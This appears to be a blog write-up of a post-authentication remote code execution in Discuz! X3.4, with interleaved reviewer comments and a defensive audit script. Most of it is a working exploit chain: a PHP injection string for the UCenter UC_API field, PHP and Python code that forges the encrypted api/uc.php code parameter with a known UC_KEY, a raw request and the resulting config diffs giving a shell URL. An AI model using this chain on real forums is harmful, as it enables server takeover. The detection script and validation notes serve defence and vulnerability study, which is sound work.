https://www.svenbeast.com/post/discuzx34-hou-tai-xiu-gai-uc_center-pei-zhi-getshell/ Discuz! X3.4: getshell by editing the UCenter configuration in the admin backend
Lab setup
BaoTa panel (寶塔) + PHP 5.6 + MySQL 5.7
https://github.com/sv3nbeast/discuz-x3.4-RCE Discuz-x3.4-RCE
# git clone https://github.com/sv3nbeast/discuz-x3.4-RCE.git discuz.x3.4.rce.bt
# cd discuz.x3.4.rce.bt
# unzip Discuz_SC_UTF8.zip
Set the BaoTa site root to upload/, then open the site URL and run through the installer (omitted).
Exploitation
Log in to the admin backend => Site => UCenter settings, and fill in:
UCenter communication key (UC_KEY): 123456
UCenter access URL (UC_API): http://discuz.x3.4.rce.bt/upload/uc_server');phpinfo();//
Submitting this form rewrites upload/config/config_ucenter.php, but the ' in UC_API is escaped, so the injected code is not live yet:
diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.php index 6df46ac..7fb0562 100644 --- a/upload/config/config_ucenter.php +++ b/upload/config/config_ucenter.php @@ -12,9 +12,8 @@ define('UC_DBCONNECT', 0); define('UC_CHARSET', 'utf-8'); -define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta'); -define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server'); +define('UC_KEY', '123456'); +define('UC_API', 'http://discuz.x3.4.rce.bt/upload/uc_server\');phpinfo();//'); define('UC_APPID', '1'); define('UC_IP', ''); define('UC_PPP', 20);
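Review bot: the + line for UC_API shows the admin-supplied quote escaped as \' while the rest of the payload (phpinfo();//) is written into config_ucenter.php unchanged, so the form handler relies on quote escaping alone for a value that is embedded in PHP source; validate UC_API as an http(s) URL (scheme, host, path characters) and reject anything else before writing it, rather than escaping it. The same hunk shows UC_KEY reduced from a 64-character value to '123456'; a minimum length for the shared key would be worth enforcing on the form as well.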
<?php
// Forge the code parameter for api/uc.php: a query string with a future
// timestamp and action=updateapps, encrypted with the UC_KEY set in step one.
$uc_key = "123456";
$time = time() + 720000;
$str = "time=".$time."&action=updateapps";
$code = authcode($str, "ENCODE", $uc_key);
// Percent-encode the two base64 characters that would otherwise break the query string.
$code = str_replace('+', '%2b', $code);
$code = str_replace('/', '%2f', $code);
echo $code;

// UCenter's authcode: RC4 keyed from UC_KEY, applied to a 10-digit expiry header,
// a 16-hex-char MD5 check over the plaintext, and the plaintext itself; the
// output is prefixed with a 4-char random salt (keyc) and base64-encoded.
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key != '' ? $key : '123456');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // RC4 key scheduling
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // RC4 keystream XOR
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == 'DECODE') {
        // Accept if the header is 0 or still in the future, and the MD5 check matches.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}
# php code.php
1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k
Using Burp Suite, intercept the GET request to /api/uc.php that carries the code parameter and send it with the XML body below.
Request:
GET /api/uc.php?code=1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k HTTP/1.1
Host: discuz.x3.4.rce.bt
Cookie: ooyE_2132_saltkey=rlpi42qL; ooyE_2132_lastvisit=1633423183; ooyE_2132_sid=iKnzwk; ooyE_2132_lastact=1633426854%09uc.php%09
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://discuz.x3.4.rce.bt/uc_server</item>
</root>
The XML carrying the UC_API item has to be added to the intercepted request by hand; its value is what ends up written into UC_API. In testing this request had to be sent twice, and only the second one took effect.
After Burp Suite forwards the request, the page returns 1.
This rewrites upload/config/config_ucenter.php and upload/uc_client/data/cache/apps.php:
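The second step end to end, as an added example that is not code from the original post or from Discuz!: a Python port of the authcode routine above, the forged code parameter with action=updateapps, and the XML body carrying the UC_API item. It shows why setting UC_KEY to a known value in step one matters: api/uc.php decrypts code with UC_KEY and trusts whatever query string comes out, so anyone who knows the key can mint valid requests. Assumptions of the example: the receiving side parses the decrypted string as a query string (mirrored here by decode_code_param), and the names build_updateapps_request and decode_code_param are this example's own. The sample UC_API value is the page's payload.

```python
"""Forge the api/uc.php?code=... request once UC_KEY is known.

Python port of UCenter's authcode (the PHP routine shown earlier) plus a
request builder; function names below are this example's own, not Discuz!'s."""
import base64
import hashlib
import secrets
import time
from urllib.parse import parse_qs, quote, urlsplit

CKEY_LENGTH = 4  # random prefix authcode puts in front of the base64 ciphertext


def _md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def _rc4(key: bytes, data: bytes) -> bytes:
    """authcode's two loops are plain RC4 keyed with the derived cryptkey."""
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def authcode(string: str, operation: str = "DECODE", key: str = "", expiry: int = 0) -> str:
    """Same key schedule, header and check as the PHP: the only secret is `key` (UC_KEY)."""
    key = _md5((key or "123456").encode())   # the PHP falls back to a fixed key when none is given
    keya = _md5(key[:16].encode())
    keyb = _md5(key[16:32].encode())
    if operation == "DECODE":
        keyc = string[:CKEY_LENGTH]
        payload = string[CKEY_LENGTH:]
        data = base64.b64decode(payload + "=" * (-len(payload) % 4))  # PHP tolerates missing '='
    else:
        keyc = secrets.token_hex(CKEY_LENGTH // 2)   # PHP: last 4 hex chars of md5(microtime())
        header = "%010d" % (expiry + int(time.time()) if expiry else 0)
        mac = _md5(string.encode() + keyb.encode())[:16]
        data = (header + mac + string).encode()
    cryptkey = (keya + _md5((keya + keyc).encode())).encode()
    result = _rc4(cryptkey, data)
    if operation != "DECODE":
        return keyc + base64.b64encode(result).decode().rstrip("=")
    head, mac, plain = result[:10], result[10:26], result[26:]
    try:
        ts = int(head)
    except ValueError:
        ts = 0   # PHP 5/7 loose comparison: a non-numeric header == 0 is true
    if (ts == 0 or ts > int(time.time())) and mac == _md5(plain + keyb.encode())[:16].encode():
        return plain.decode()
    return ""


def build_updateapps_request(uc_key: str, uc_api: str, lifetime: int = 720000):
    """(path-with-query, XML body) for the forged call; the post uses time()+720000."""
    plain = "time=%d&action=updateapps" % (int(time.time()) + lifetime)
    code = authcode(plain, "ENCODE", uc_key)
    path = "/api/uc.php?code=" + quote(code, safe="")  # the PHP hand-encodes '+' and '/' the same way
    body = ('<?xml version="1.0" encoding="ISO-8859-1"?>\n<root>\n'
            '<item id="UC_API">%s</item>\n</root>\n' % uc_api)
    return path, body


def decode_code_param(uc_key: str, path: str) -> dict:
    """What the receiving side sees: decrypt code with UC_KEY and parse it as a query
    string (assumed from the page's time=...&action=... format). Wrong key -> empty dict."""
    code = parse_qs(urlsplit(path).query)["code"][0]
    fields = parse_qs(authcode(code, "DECODE", uc_key))
    return {k: v[0] for k, v in fields.items()}


if __name__ == "__main__":
    p, b = build_updateapps_request("123456", "http://discuz.x3.4.rce.bt/uc_server');phpinfo();//")
    print("GET " + p + " HTTP/1.1\nHost: discuz.x3.4.rce.bt\n\n" + b)
    print(decode_code_param("123456", p))
```

Note that the integrity check only covers the plaintext after byte 26: tampering with the 10-byte header is not detected by the MD5 check, and the wrong-key and tamper cases both come back as the empty string, which is all a caller gets to distinguish them.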
diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.php
index 6df46ac..7ceb6e0 100644
--- a/upload/config/config_ucenter.php
+++ b/upload/config/config_ucenter.php
@@ -12,9 +12,8 @@
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
-define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');
-define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');
+define('UC_KEY', '123456');
+define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');phpinfo();//'); // the escaping is gone, injection complete
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);
-?>
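Review bot: in the + line for UC_API the value now contains an unescaped quote followed by phpinfo();//, so this write path does no escaping at all, unlike the admin form path in the first diff; whatever rewrites config_ucenter.php on updateapps needs the same validation (a plain http(s) URL) before the value is interpolated into define('UC_API', '...');. The hunk also drops the trailing ?> line without explanation; harmless for PHP, but it is a second unintended change to the file from the same write.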
diff --git a/upload/uc_client/data/cache/apps.php b/upload/uc_client/data/cache/apps.php
index 7948d40..54e6afa 100644
--- a/upload/uc_client/data/cache/apps.php
+++ b/upload/uc_client/data/cache/apps.php
@@ -1,22 +1,3 @@
<?php
$_CACHE['apps'] = array (
- 1 =>
- array (
- 'appid' => '1',
- 'type' => 'DISCUZX',
- 'name' => 'Discuz! Board',
- 'url' => 'http://discuz.x3.4.rce.bt',
- 'ip' => '',
- 'viewprourl' => '',
- 'apifilename' => 'uc.php',
- 'charset' => '',
- 'dbcharset' => '',
- 'synlogin' => '1',
- 'recvnote' => '1',
- 'extra' => false,
- 'tagtemplates' => '',
- 'allowips' => '',
- ),
);
-
-?>
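Review bot: the whole entry for appid 1 is deleted and $_CACHE['apps'] becomes an empty array, so the forged updateapps request wiped the application list rather than updating it; a handler should refuse to overwrite a non-empty cache with an empty list. From the defender's side, this file shrinking to an empty array at the same time as config_ucenter.php changes is a usable detection signal.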
At this point http://discuz.x3.4.rce.bt/config/config_ucenter.php is our shell URL, and the getshell is complete.
As the first step shows, this getshell requires logging in to the admin backend and editing the UCenter configuration, so it is a post-authentication issue: an administrator account (or a hijacked admin session) is the precondition. The Discuz! X3.4 backend should therefore be restricted by IP to keep this from being exploited.
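A quick post-incident check, as an added example and not part of the original post, that audits the two files the diffs above show being rewritten. It assumes a legitimate UC_API is a plain http(s) URL and that a generated UC_KEY is long random text like the 64-character one in the diff; the 32-character minimum is this example's threshold, not a Discuz! rule. The sample file contents are constructed from the diffs above.

```python
"""Offline audit of config_ucenter.php and uc_client/data/cache/apps.php
for the changes this getshell leaves behind (example code, not Discuz!'s)."""
import re
from urllib.parse import urlparse

# A legitimate UC_API value is a plain URL: quotes, parentheses and
# semicolons never belong in it, whether escaped or not.
UC_API_LINE = re.compile(r"^define\('UC_API', '([A-Za-z0-9:/._~%-]*)'\);$")
UC_KEY_LINE = re.compile(r"^define\('UC_KEY', '([^'\\]*)'\);$")
MIN_KEY_LEN = 32   # assumption: generated keys are long random strings (64 chars in the diff)


def audit_config_ucenter(text: str) -> list:
    """Return a list of findings for the UC_API and UC_KEY defines."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("define('UC_API',"):
            m = UC_API_LINE.match(line)
            if not m:
                findings.append("UC_API: define line is not a plain quoted URL: " + line)
                continue
            url = urlparse(m.group(1))
            if url.scheme not in ("http", "https") or not url.netloc:
                findings.append("UC_API: value is not an http(s) URL: " + m.group(1))
        elif line.startswith("define('UC_KEY',"):
            m = UC_KEY_LINE.match(line)
            if not m or len(m.group(1)) < MIN_KEY_LEN:
                findings.append("UC_KEY: key is missing, malformed or shorter than %d chars" % MIN_KEY_LEN)
    return findings


def audit_apps_cache(text: str) -> list:
    """Flag an apps cache that lists no applications, the post-exploitation state in the diff."""
    compact = re.sub(r"\s+", "", text)
    if "$_CACHE['apps']=array();" in compact:
        return ["apps.php: application list is empty"]
    return []


# Constructed samples, taken from the diffs above.
CLEAN_CONFIG = """
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');
define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');
define('UC_APPID', '1');
"""
ESCAPED_CONFIG = r"""
define('UC_KEY', '123456');
define('UC_API', 'http://discuz.x3.4.rce.bt/upload/uc_server\');phpinfo();//');
"""
PWNED_CONFIG = """
define('UC_KEY', '123456');
define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');phpinfo();//');
"""
CLEAN_APPS = """<?php
$_CACHE['apps'] = array (
  1 =>
  array (
    'appid' => '1',
    'type' => 'DISCUZX',
  ),
);
"""
PWNED_APPS = """<?php
$_CACHE['apps'] = array (
);
"""

if __name__ == "__main__":
    for name, cfg in (("clean", CLEAN_CONFIG), ("after form", ESCAPED_CONFIG), ("after api", PWNED_CONFIG)):
        print(name, audit_config_ucenter(cfg))
    print("apps clean", audit_apps_cache(CLEAN_APPS))
    print("apps after api", audit_apps_cache(PWNED_APPS))
```

The step-one file (escaped quote) is flagged as well as the final one, which is the point: a URL field containing a quote at all is worth an alert, even before the second request makes it executable.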
To reproduce the vulnerability again: after # git reset --hard, remember to make upload/config/config_ucenter.php and upload/uc_client/data/cache/apps.php writable by the www user, otherwise the backend form misbehaves.